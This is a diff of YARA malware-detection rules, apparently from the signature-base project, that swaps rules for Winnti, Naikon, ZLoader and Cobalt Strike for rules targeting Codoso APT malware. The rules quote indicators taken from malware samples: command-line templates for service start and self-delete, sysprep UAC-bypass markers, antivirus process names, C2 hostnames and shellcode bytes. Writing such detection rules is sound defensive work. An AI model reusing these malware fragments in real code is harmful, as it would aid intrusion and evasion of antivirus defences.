+		logic_hash = "a355ac60dca5ca880a90a5c2720690b4691630fd434411758fa7ff006f7389ba"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0dd09bc97c768abb84d0fb6d1ae7d789f1f83bfb2ce93ff9ff3c538dc1effa33"
 
 	strings:
-		$s1 = "x64passldr.exe" fullword ascii
-		$s2 = "DCR.sys" fullword ascii
-		$s3 = "amd64\\x64pass.sys" fullword ascii
+		$s1 = "varus_service_x86.dll" fullword ascii
+		$s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
+		$s3 = "net start %%1" fullword ascii
+		$s4 = "ping 127.1 > nul" fullword ascii
+		$s5 = "McInitMISPAlertEx" fullword ascii
+		$s6 = "sc start %%1" fullword ascii
+		$s7 = "B_WKNDNSK^" fullword ascii
+		$s8 = "net stop %%1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of them
 }
-rule SIGNATURE_BASE_EXP_Drivecrypt_X64Passldr : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_6 : FILE
 {
 	meta:
-		description = "Detects DriveCrypt exploit"
+		description = "Detects Codoso APT PGV_PVID Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94594b4e-091d-5964-b2b4-5d7d44601b28"
-		date = "2018-08-21"
-		modified = "2023-01-06"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_drivecrypt.yar#L19-L38"
+		id = "6d1d8490-fdcb-5263-ae00-0b436e822fc3"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L115-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "573cd96f7f82788a3884cd4b4d91c739a890835c3ed1b3933af48ba5756cc5a6"
+		hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
+		logic_hash = "0907274bd6c97b7d7b2913e42aa748c92012aeeb32196ddcbcd30332f4e95ac9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c828304c83619e2cb9dab80305e5286aba91742dc550e1469d91812af27101a1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\x64\\x64passldr.pdb" ascii
-		$s2 = "\\amd64\\x64pass.sys" wide
-		$s3 = "\\\\.\\DCR" fullword ascii
-		$s4 = "Open SC Mgr Error" fullword ascii
-		$s5 = "thing is ok " fullword ascii
-		$s6 = "x64pass" fullword wide
-		$s7 = "%ws\\%ws\\Security" fullword wide
+		$s0 = "rundll32 \"%s\",%s" fullword ascii
+		$s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Backdoor_Naikon_APT_Sample1 : FILE
+rule SIGNATURE_BASE_Codoso_Gh0St_3 : FILE
 {
 	meta:
-		description = "Detects backdoors related to the Naikon APT"
+		description = "Detects Codoso APT Gh0st Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ba79285b-7c7f-5b19-837e-6696e50a2866"
-		date = "2015-05-14"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/7vHyvh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_naikon.yar#L2-L36"
+		id = "55fb17c5-ee11-55be-9af3-e9fe8d6160b5"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L130-L151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
-		hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
-		logic_hash = "e582fc3518dab2392a79909b5369c48656b6f280b915fad4befb0839ec7ce1bd"
+		hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
+		logic_hash = "e24d434d8f08b83f8e4b1f4aa75a84a040e4f56cdbd9a58ff49c463437e78c24"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
-		$x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
-		$x2 = "greensky27.vicp.net" fullword ascii
-		$x3 = "\\tempvxd.vxd.dll" wide
-		$x5 = "otna.vicp.net" fullword ascii
-		$s1 = "User-Agent: webclient" fullword ascii
-		$s2 = "\\User.ini" ascii
-		$s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
-		$s4 = "\\UserProfile.dll" wide
-		$s5 = "Connection:Keep-Alive: %d" fullword ascii
-		$s6 = "Referer: http://%s:%d/" ascii
-		$s7 = "%s %s %s %d %d %d " fullword ascii
-		$s8 = "%s--%s" fullword wide
-		$s9 = "Run File Success!" fullword wide
-		$s10 = "DRIVE_REMOTE" fullword wide
-		$s11 = "ProxyEnable" fullword wide
-		$s12 = "\\cmd.exe" wide
+		$x1 = "RunMeByDLL32" fullword ascii
+		$s1 = "svchost.dll" fullword wide
+		$s2 = "server.dll" fullword ascii
+		$s3 = "Copyright ? 2008" fullword wide
+		$s4 = "testsupdate33" fullword ascii
+		$s5 = "Device Protect Application" fullword wide
+		$s6 = "MSVCP60.DLL" fullword ascii
+		$s7 = "mail-news.eicp.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 7 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
 }
-rule SIGNATURE_BASE_MAL_DOC_Zloader_Oct20_1 : FILE
+rule SIGNATURE_BASE_Codoso_Gh0St_2 : FILE
 {
 	meta:
-		description = "Detects weaponized ZLoader documents"
+		description = "Detects Codoso APT Gh0st Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "34145746-9733-5dd9-9dcf-99e3a3ceee4f"
-		date = "2020-10-10"
+		id = "5643d028-2a76-5bce-bf2f-8be706ab1fd5"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JohnLaTwC/status/1314602421977452544"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_zloader_maldocs.yar#L2-L22"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L152-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f546a860361d3caff99c282465dbbd1880460c7491a1b5ad065c1b5d91e5d49"
+		hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
+		logic_hash = "5864e52820578769a31a6925795d13283d7b3bc5f9ac50ac8aea6578a5919e71"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "668ca7ede54664360b0a44d5e19e76beb92c19659a8dec0e7085d05528df42b5"
-		hash2 = "a2ffabbb1b5a124f462a51fee41221081345ec084d768ffe1b1ef72d555eb0a0"
-		hash3 = "d268af19db475893a3d19f76be30bb063ab2ca188d1b5a70e51d260105b201da"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { 78 4E FC 04 AB 6B 17 E2 33 E3 49 62 50 69 BB 60
-               31 00 1E 00 02 4B BA E2 D8 E3 92 22 1E 69 96 20
-               98 }
-		$sc2 = { 6B 9E E2 36 E3 69 62 72 69 3A 60 55 6E }
-		$sc3 = { 3E 69 76 60 59 6E 34 FB 87 6B 75 }
+		$s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+		$s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+		$s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$s14 = "%s -r debug 1" fullword ascii
+		$s15 = "\\\\.\\keymmdrv1" fullword ascii
+		$s17 = "RunMeByDLL32" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 40KB and filesize > 30KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22
+rule SIGNATURE_BASE_Codoso_Customtcp : FILE
 {
 	meta:
-		description = "Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated"
-		author = "CodeX"
-		id = "d396ab0e-b584-5a7c-8627-5f318a20f9dd"
-		date = "2022-07-04"
+		description = "Codoso CustomTCP Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cobaltstrike.yar#L3-L15"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L171-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "233b3cb441f45f400c0261589aac31dd1fcd9c4e3a86a6aaa46c60849063b34b"
-		score = 80
+		hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
+		logic_hash = "4f0333de25b9f84ecaa3e63c5f600f53929244cd63a681d21cb78cfe17ca15f9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sleep_mask = { 48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 45 33 DB 45 33 D2 33 FF 33 F6 48 8B E9 BB 03 00 00 00 85 D2 0F 84 81 00 00 00 0F B6 45 }
+		$s4 = "wnyglw" fullword ascii
+		$s5 = "WorkerRun" fullword ascii
+		$s7 = "boazdcd" fullword ascii
+		$s8 = "wayflw" fullword ascii
+		$s9 = "CODETABL" fullword ascii
 
 	condition:
-		$sleep_mask
+		uint16( 0 ) == 0x5a4d and filesize < 405KB and all of them
 }
-rule SIGNATURE_BASE_Winnti_Signing_Cert : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_5 : FILE
 {
 	meta:
-		description = "Detects a signing certificate used by the Winnti APT group"
+		description = "Detects Codoso APT PGV PVID Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0cf185eb-fb8d-5e1f-9089-4f36eb4798de"
-		date = "2015-10-10"
-		modified = "2025-08-11"
-		reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L9-L26"
+		id = "0202d82c-c1f8-59f7-96b6-b21f21c1dc69"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L192-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6fd5f2808e7d683b9c4b7f5d4ccfd0eb87037eb2e70700b2c083db8c6ddf4a26"
+		logic_hash = "e248bada3ac46611bbe2cf1e1afee902191a2c1fb9611c4a052318e5e093b015"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
-		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$s1 = "Guangzhou YuanLuo Technology Co." ascii
-		$s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
-		$s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
+		$s1 = "/c del %s >> NUL" fullword ascii
+		$s2 = "%s%s.manifest" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Winnti_Malware_Nsiproxy : FILE
+rule SIGNATURE_BASE_Codoso_Gh0St_1 : FILE
 {
 	meta:
-		description = "Detects a Winnti rootkit"
+		description = "Detects Codoso APT Gh0st Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b14541c-6077-5f3b-8f73-ff3d283bf209"
-		date = "2015-10-10"
-		modified = "2025-08-11"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L28-L54"
+		id = "24d9e64c-4b35-5737-92ae-8ec391d494c7"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L209-L247"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "742b091cc630ecea995be8d022eabadef1725dbd952f66a9ca62ecdee6985733"
+		logic_hash = "799ae0946464e5b4980f792e525da9eec46aa7844ec977f892a80f58d8b22afd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
-		hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
-		hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
-		hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
-		hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
+		super_rule = 1
+		hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
+		hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
+		hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
 
 	strings:
-		$x1 = "\\Driver\\nsiproxy" wide
-		$a1 = "\\Device\\StreamPortal" wide
-		$a2 = "\\Device\\PNTFILTER" wide
-		$s1 = "Cookie: SN=" fullword ascii
-		$s2 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
-		$s3 = "Winqual.sys" fullword wide
-		$s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" wide
-		$s5 = "http://www.wasabii.com.tw 0" fullword ascii
+		$x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+		$x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+		$x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$x4 = "\\\\.\\keymmdrv1" fullword ascii
+		$s1 = "spideragent.exe" fullword ascii
+		$s2 = "AVGIDSAgent.exe" fullword ascii
+		$s3 = "kavsvc.exe" fullword ascii
+		$s4 = "mspaint.exe" fullword ascii
+		$s5 = "kav.exe" fullword ascii
+		$s6 = "avp.exe" fullword ascii
+		$s7 = "NAV.exe" fullword ascii
+		$c1 = "Elevation:Administrator!new:" wide
+		$c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
+		$c3 = "\\sysprep\\sysprep.exe" wide
+		$c4 = "\\sysprep\\CRYPTBASE.dll" wide
+		$c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
+		$c6 = "ConsentPromptBehaviorAdmin" fullword ascii
+		$c7 = "\\sysprep" wide
+		$c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $x1 and 1 of ( $a* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) or 4 of ( $c* ) ) or 1 of ( $x* ) or 6 of ( $c* )
 }
-rule SIGNATURE_BASE_Winnti_Malware_Updatedll : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_4 : FILE
 {
 	meta:
-		description = "Detects a Winnti malware - Update.dll"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6896191-d856-55f2-a47f-621a4f10d0c7"
-		date = "2015-10-10"
-		modified = "2025-08-11"
-		reference = "VTI research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L56-L89"
+		id = "c1c753a6-77b6-5bfb-89f9-16127c264fd0"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L248-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b483e77106cc0e2f8ed2398de8b34b8246472875ad3e0612fa06cac96b7e6aa"
+		logic_hash = "f24100c0fe837511ce6144224eda397fed3931072e364f1b5be49c7bb4102aa4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
-		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
-		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
-		hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+		hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
+		hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii
-		$c2 = "AHDNEAFE1.sys" fullword ascii
-		$c3 = "SOTEFEHJ3.sys" fullword ascii
-		$c4 = "MainSYS64.sys" fullword ascii
-		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
-		$s2 = "Update.dll" fullword ascii
-		$s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide
-		$s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide
-		$s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
-		$s6 = "\\??\\pipe\\usbpcg%d" fullword wide
-		$s7 = "\\??\\pipe\\usbpcex%d" fullword wide
-		$s8 = "HOST: %s" fullword ascii
-		$s9 = "$$$--Hello" fullword ascii
+		$x1 = "dropper, Version 1.0" fullword wide
+		$x2 = "dropper" fullword wide
+		$x3 = "DROPPER" fullword wide
+		$x4 = "About dropper" fullword wide
+		$s1 = "Microsoft Windows Manager Utility" fullword wide
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii
+		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii
+		$s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii
+		$s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $c* ) and 3 of ( $s* ) ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of ( $x* ) and 2 of ( $s* )
 }
-rule SIGNATURE_BASE_Winnti_Malware_FWPK : FILE
+rule SIGNATURE_BASE_Codoso_Plugx_1 : FILE
 {
 	meta:
-		description = "Detects a Winnti malware - FWPKCLNT.SYS"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "591ad72d-b9d4-5cd9-9103-37e001026610"
-		date = "2015-10-10"
-		modified = "2023-01-06"
-		reference = "VTI research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L90-L117"
+		id = "af777818-5cff-5571-b5e9-0f5a4c8b08ff"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L276-L294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e87b06f6bf11dceb04c8eb4910f5d98ec3fe430fa984eeed8b73e99b28c5abe"
+		logic_hash = "34736c85699a94b1413e5f9934e1a55841e8296df61d558bccf2d477e545d156"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
-		hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
-		hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
+		hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
+		hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
 
 	strings:
-		$s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" wide
-		$s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii
-		$s2 = "FWPKCLNT.SYS" fullword ascii
-		$s3 = "Port Layer" fullword wide
-		$s4 = "%x->%x, icmp type %d, code %d" fullword ascii
-		$s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" wide
-		$s6 = "\\Ndi\\Interfaces" wide
-		$s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" wide
-		$s8 = "Bad packet" fullword ascii
-		$s9 = "\\BaseNamedObjects\\EKV0000000000" wide
-		$s10 = "%x->%x" fullword ascii
-		$s11 = "IPInjectPkt" fullword ascii
+		$s1 = "GETPASSWORD1" fullword ascii
+		$s2 = "NvSmartMax.dll" fullword ascii
+		$s3 = "LICENSEDLG" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 642KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Winnti_Malware_Streamportal_Gen : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_3
 {
 	meta:
-		description = "Detects a Winnti malware - Streamportal"
+		description = "Detects Codoso APT PGV PVID Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9d31d6b-a6f7-5359-b741-960b678e0b9c"
-		date = "2015-10-10"
-		modified = "2025-08-11"
-		reference = "VTI research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L119-L141"
+		id = "08003dba-1201-5f74-9edd-ea321bb26e99"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L295-L314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "249f51b263fbcab650983d75482fd4787934731e415fcbd0e6f6925032aac690"
+		logic_hash = "371a91b08747b8025baba79797baf9f29487f9c3541f27fc2c2716b531d30b54"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
-		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
-		hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
+		super_rule = 1
+		hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
+		hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+		hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
+		hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$s0 = "Proxies destination address/port for TCP" fullword wide
-		$s3 = "\\Device\\StreamPortal" wide
-		$s4 = "Transport-Data Proxy Sub-Layer" fullword wide
-		$s5 = "Cookie: SN=" fullword ascii
-		$s6 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
-		$s17 = "NTOSKRNL.EXE" fullword wide
-		$s19 = "FwpsReferenceNetBufferList0" fullword ascii
+		$x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 275KB and all of them
+		$x1
 }
-
-rule SIGNATURE_BASE_WINNTI_Kingsoft_Moz_Confustion : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_2 : FILE
 {
 	meta:
-		description = "Detects Barium sample with Copyright confusion"
-		author = "Markus Neis"
-		id = "0c45c1ff-6734-504f-91d1-cf5d6744252f"
-		date = "2018-04-13"
-		modified = "2025-08-11"
-		reference = "https://www.virustotal.com/en/file/070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496/analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L143-L159"
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4c00806-3092-5ec2-844f-b638c31fa6a5"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L315-L337"
